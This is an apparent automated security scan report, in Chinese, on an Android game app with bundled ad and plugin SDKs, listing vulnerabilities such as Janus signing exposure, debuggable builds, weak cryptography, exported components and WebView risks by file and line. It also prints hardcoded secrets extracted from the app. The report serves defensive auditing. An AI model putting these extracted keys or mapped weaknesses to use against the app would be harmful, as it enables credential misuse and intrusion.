安全分析报告:
安全分数
安全分数 49/100
风险评级
等级
- A
- B
- C
- F
严重性分布 (%)
隐私风险
4
用户/设备跟踪器
调研结果
高危
3
中危
16
信息
1
安全
2
关注
0
高危 应用程序容易受到 Janus 漏洞的影响
应用程序使用 v1 签名方案进行签名,如果仅使用 v1 签名方案进行签名,则在 Android 5.0-8.0 上容易受到 Janus 漏洞的影响。在使用 v1 和 v2/v3 方案签名的 Android 5.0-7.0 上运行的应用程序也容易受到攻击。
高危 启用了调试配置。生产版本不能是可调试的
启用了调试配置。生产版本不能是可调试的 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04c-Tampering-and-Reverse-Engineering.md#debugging-and-tracing Files: com/invictus/impossiball/BuildConfig.java, line(s) 3,4 com/prime31/InAppBilling/BuildConfig.java, line(s) 3,4
高危 应用程序使用带PKCS5/PKCS7填充的加密模式CBC。此配置容易受到填充oracle攻击。
应用程序使用带PKCS5/PKCS7填充的加密模式CBC。此配置容易受到填充oracle攻击。 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: com/wandoujia/ads/sdk/legacy/util/AESUtil.java, line(s) 22 com/wandoujia/ads/sdk/legacy/util/CipherUtil.java, line(s) 18
中危 应用程序数据存在被泄露的风险
未设置[android:allowBackup]标志 这个标志 [android:allowBackup]应该设置为false。默认情况下它被设置为true,允许任何人通过adb备份你的应用程序数据。它允许已经启用了USB调试的用户从设备上复制应用程序数据。
中危 Activity (com.wandoujia.standalone_sdk.StandAloneSdkActivity) 未被保护。
存在一个intent-filter。 发现 Activity与设备上的其他应用程序共享,因此让它可以被设备上的任何其他应用程序访问。intent-filter的存在表明这个Activity是显式导出的。
中危 Broadcast Receiver (com.wandoujia.standalone_sdk.BootReceiverWrapper) 未被保护。
存在一个intent-filter。 发现 Broadcast Receiver与设备上的其他应用程序共享,因此让它可以被设备上的任何其他应用程序访问。intent-filter的存在表明这个Broadcast Receiver是显式导出的。
中危 Service (com.ehoo.post.EhooPostService) 未被保护。
存在一个intent-filter。 发现 Service与设备上的其他应用程序共享,因此让它可以被设备上的任何其他应用程序访问。intent-filter的存在表明这个Service是显式导出的。
中危 MD5是已知存在哈希冲突的弱哈希
MD5是已知存在哈希冲突的弱哈希 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: com/tencent/mm/a/b.java, line(s) 9 com/wandoujia/ads/sdk/legacy/util/g.java, line(s) 17 com/wandoujia/standalone_api/upgrade/a.java, line(s) 43 utils/MD5Checksum.java, line(s) 14,28 utils/Utils.java, line(s) 199
中危 应用程序可以读取/写入外部存储器,任何应用程序都可以读取写入外部存储器的数据
应用程序可以读取/写入外部存储器,任何应用程序都可以读取写入外部存储器的数据 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#external-storage Files: com/prime31/EtceteraPlugin.java, line(s) 804,805,839,840 com/prime31/EtceteraProxyActivity.java, line(s) 81,82 com/prime31/PlayGameServicesPlugin.java, line(s) 513,528 com/tencent/a/a/a/a/b.java, line(s) 17,29,31 com/wandoujia/ads/sdk/download/InMemoryAppDownloadManager.java, line(s) 93,101 com/wandoujia/ads/sdk/f.java, line(s) 51,139,141 com/wandoujia/ads/sdk/legacy/util/UDIDUtil.java, line(s) 68 com/wandoujia/ads/sdk/legacy/util/f.java, line(s) 106,107 com/wandoujia/ads/sdk/legacy/util/m.java, line(s) 46 com/wandoujia/standalone_api/a/a.java, line(s) 29,30 com/wandoujia/standalone_api/upgrade/SilentUpdate.java, line(s) 212,213 service/DownloadService.java, line(s) 43 utils/DownLoadUtil.java, line(s) 13
中危 应用程序使用不安全的随机数生成器
应用程序使用不安全的随机数生成器 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#weak-random-number-generators Files: com/wandoujia/ads/sdk/legacy/util/AESUtil.java, line(s) 10 org/springframework/http/converter/FormHttpMessageConverter.java, line(s) 15 utils/PhoneUtils.java, line(s) 18 utils/Utils.java, line(s) 32
中危 SHA-1是已知存在哈希冲突的弱哈希
SHA-1是已知存在哈希冲突的弱哈希 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04g-Testing-Cryptography.md#identifying-insecure-andor-deprecated-cryptographic-algorithms-mstg-crypto-4 Files: com/prime31/GameHelperUtils.java, line(s) 125
中危 文件可能包含硬编码的敏感信息,如用户名、密码、密钥等
文件可能包含硬编码的敏感信息,如用户名、密码、密钥等 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#checking-memory-for-sensitive-data-mstg-storage-10 Files: com/invictus/impossiball/Const.java, line(s) 6 com/invictus/impossiball/MainActivity.java, line(s) 25,52 com/prime31/EtceteraPlugin.java, line(s) 83,85,84 utils/Constant.java, line(s) 5
中危 可能存在跨域漏洞。在 WebView 中启用从 URL 访问文件可能会泄漏文件系统中的敏感信息
可能存在跨域漏洞。在 WebView 中启用从 URL 访问文件可能会泄漏文件系统中的敏感信息 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#static-analysis-6 Files: adview/WebViewActivity.java, line(s) 77,70 com/prime31/WebViewActivity.java, line(s) 79,97,75
中危 应用程序创建临时文件。敏感信息永远不应该被写进临时文件
应用程序创建临时文件。敏感信息永远不应该被写进临时文件 Files: com/prime31/EtceteraProxyActivity.java, line(s) 72
中危 不安全的Web视图实现。可能存在WebView任意代码执行漏洞
不安全的Web视图实现。可能存在WebView任意代码执行漏洞 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05h-Testing-Platform-Interaction.md#testing-javascript-execution-in-webviews-mstg-platform-5 Files: adview/WebViewActivity.java, line(s) 64,70
中危 IP地址泄露
IP地址泄露 Files: com/wandoujia/standalone_api/upgrade/SilentUpdate.java, line(s) 97,183
中危 应用程序使用SQLite数据库并执行原始SQL查询。原始SQL查询中不受信任的用户输入可能会导致SQL注入。敏感信息也应加密并写入数据库
应用程序使用SQLite数据库并执行原始SQL查询。原始SQL查询中不受信任的用户输入可能会导致SQL注入。敏感信息也应加密并写入数据库 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x04h-Testing-Code-Quality.md#injection-flaws-mstg-arch-2-and-mstg-platform-2 Files: com/wandoujia/ads/sdk/d.java, line(s) 4,5,25,29,37
中危 应用程序包含隐私跟踪程序
此应用程序有多个4隐私跟踪程序。跟踪器可以跟踪设备或用户,是终端用户的隐私问题。
中危 此应用可能包含硬编码机密信息
从应用程序中识别出以下机密确保这些不是机密或私人信息 "chartboost_unity_app_id" : "4f7b433509b6025804000002" 0627f71ad446f8ec3f7be42ab1a92c73 6X8Y4XdM2Vhvn0KfzcEatGnWaNU= 961453575460764ca5bc4a3ebc989c44 1e05e0e27b804482b24a6132d81f27a2 b543e392e2f8470d8a9342ec08dc02a5 fe9285eacf37c951e1f8d54666721835 qSX538Vb4hDkQ2sFtrbANWQTkCjzckKa 07a25f16f6e4437aba3c705a61b84534 3C1A0B7D67EAAACB9BCEAC7309F6A739 071e0c8e08802e19c807b1d579804c86
信息 应用程序记录日志信息,不得记录敏感信息
应用程序记录日志信息,不得记录敏感信息 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05d-Testing-Data-Storage.md#logs Files: adview/RewardVideoActivity.java, line(s) 139,146,153 com/invictus/impossiball/GameSdkApplication.java, line(s) 20,22 com/invictus/impossiball/MainActivity.java, line(s) 59,62,70,76,95,179,180,181,202,211,305,327,330,333,338,350,362,374,386,238,243,248,254,264,269,274,281 com/jayway/jsonpath/JsonModel.java, line(s) 139 com/prime31/ActivityProxyObjectHelper.java, line(s) 40,50,38,48 com/prime31/AlarmManagerReceiver.java, line(s) 115,27,30,34,64,66,69,75,77,79,82,87,90,97,118,127,131,140 com/prime31/AuthenticationProxyActivity.java, line(s) 25,39,46,52,59,63,73 com/prime31/ContactFetcher.java, line(s) 19 com/prime31/EtceteraPlugin.java, line(s) 239,245,254,262,497,499,691,704,730,756,105,152,177,204,431,448,450,462,509,514,519,531,543,546,554,567,655,678,681,708,711,744,776,786,793,815,826,873,891,914,923,932,977,990,1002,1014,1048,1053,1055,1058,1153,1195,1201,1207,1215,1243,475,476 com/prime31/EtceteraPluginBase.java, line(s) 49,109,36,38,40,54,81,84,87,92 com/prime31/EtceteraProxyActivity.java, line(s) 84,180,110,133,39,58,74,111,124,143,146,150,159,162,165,167,182,186,191,196,200,215,219,224,247,253,88 com/prime31/GameHelper.java, line(s) 615,492,564,580,624,515,184,218,228,259,266,280,401,524,620 com/prime31/GameHelperUtils.java, line(s) 75,76,77,78,79,80,81,82,83,84,85,87,90,91,92,93,94,95,96,97,98,99,100,101,160 com/prime31/GoogleIABPlugin.java, line(s) 180,54,87,101,109,130,134,153,161,176,191,226,245,105,114,157 com/prime31/GoogleIABPluginBase.java, line(s) 49,97,36,38,40,54,69,72,75,80,109,124 com/prime31/GoogleIABProxyActivity.java, line(s) 53,34,46,17,25,31,32 com/prime31/IABConstants.java, line(s) 12,18,24,37 com/prime31/ImageUtils.java, line(s) 31,33,37,40,53 com/prime31/P31VideoPlayerActivity.java, line(s) 239,249,254,260,132,165,225,57,61,84,92,102,104,113,141,145,200,213,215,269,223 com/prime31/PlayGameServicesPlugin.java, line(s) 258,300,89,110,137,160,317,322,338,341,343,345,353,357,363,365,438,454,474,494,501,509,514,519,524,529,534,546,608,652,768,919,947,989,999,597,634 com/prime31/PlayGameServicesPluginBase.java, line(s) 67,161,54,56,58,72,87,90,93,98,110,113,116,121,133,136,139,144,172 com/prime31/RealtimeMultiplayer.java, line(s) 136,77,212,294,298,309,327,331,342,51,54,57,60,63,66,69,91,108,120,125,132,145,152,160,243,245,279,303,319,336,347,352,358,364,371,377,384,401,408,413,418,426,434,442,450,458,466,472,478 com/prime31/SamsungCameraHack.java, line(s) 17,25,32,37,39,44,46,50,54 com/prime31/TurnBasedMultiplayer.java, line(s) 34,54,72,77,78,79,94,189,198,203,215,225,229,307,321,335,357,379,438 com/prime31/UnityPlayerActivity.java, line(s) 19 com/prime31/UnityPlayerNativeActivity.java, line(s) 19 com/prime31/WebViewActivity.java, line(s) 145,39,89,150,163 com/prime31/util/IabHelper.java, line(s) 711,108,198,588,650,715 com/prime31/util/Inventory.java, line(s) 28,41,53 com/prime31/util/Security.java, line(s) 23,27,40,45,56,61,64,67,70 com/tencent/a/a/a/a/b.java, line(s) 28,36 com/tencent/a/a/a/a/c.java, line(s) 31,45 com/tencent/a/a/a/a/d.java, line(s) 22,31 com/tencent/a/a/a/a/e.java, line(s) 21,30 com/tencent/a/a/a/a/h.java, line(s) 14,40,50,57,43 com/wandoujia/ads/sdk/d.java, line(s) 36 com/wandoujia/ads/sdk/download/AppDownloadService.java, line(s) 52,70,80,82,87,90,72 com/wandoujia/ads/sdk/download/InMemoryAppDownloadManager.java, line(s) 62,136,147,200 com/wandoujia/ads/sdk/download/a.java, line(s) 41,44 com/wandoujia/ads/sdk/f.java, line(s) 154,77 com/wandoujia/ads/sdk/g.java, line(s) 13 com/wandoujia/ads/sdk/initsteps/f.java, line(s) 37,47,53,60,61,62,74 com/wandoujia/ads/sdk/legacy/util/f.java, line(s) 144,188,193,200,323,329 com/wandoujia/ads/sdk/legacy/util/m.java, line(s) 40 com/wandoujia/ads/sdk/ui/BannerView.java, line(s) 285 com/wandoujia/ads/sdk/utils/n.java, line(s) 49 com/wandoujia/pluginframework/PluginFrameworkInitor.java, line(s) 97,35,75 com/wandoujia/pluginframework/PluginManager.java, line(s) 50 com/wandoujia/pluginframework/a/b.java, line(s) 32,120 com/wandoujia/pluginframework/a/e.java, line(s) 98 com/wandoujia/standalone_api/b.java, line(s) 17,30 org/fmod/FMODAudioDevice.java, line(s) 144 org/fmod/a.java, line(s) 83 org/springframework/http/client/support/HttpAccessor.java, line(s) 38,37 org/springframework/web/client/HttpMessageConverterExtractor.java, line(s) 32,39,31,38 org/springframework/web/client/RestTemplate.java, line(s) 318,359,411,413,316,325,358,409,327 service/DownloadService.java, line(s) 97,105 utils/ClickUtils.java, line(s) 70 utils/DownLoadUtil.java, line(s) 70 utils/DspReqestJson.java, line(s) 28,34 utils/HttpUtil.java, line(s) 44,70,76,133 utils/Loger.java, line(s) 7,15,11,19,23 utils/Player.java, line(s) 94,204,209 utils/Utils.java, line(s) 90,108
安全 此应用程序使用SSL Pinning 来检测或防止安全通信通道中的MITM攻击
此应用程序使用SSL Pinning 来检测或防止安全通信通道中的MITM攻击 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05g-Testing-Network-Communication.md#testing-custom-certificate-stores-and-certificate-pinning-mstg-network-4 Files: com/wandoujia/ads/sdk/f.java, line(s) 114,114
安全 此应用程序可能具有Root检测功能
此应用程序可能具有Root检测功能 https://github.com/OWASP/owasp-mstg/blob/master/Document/0x05j-Testing-Resiliency-Against-Reverse-Engineering.md#testing-root-detection-mstg-resilience-1 Files: com/wandoujia/ads/sdk/f.java, line(s) 138 com/wandoujia/ads/sdk/legacy/util/f.java, line(s) 304,285,289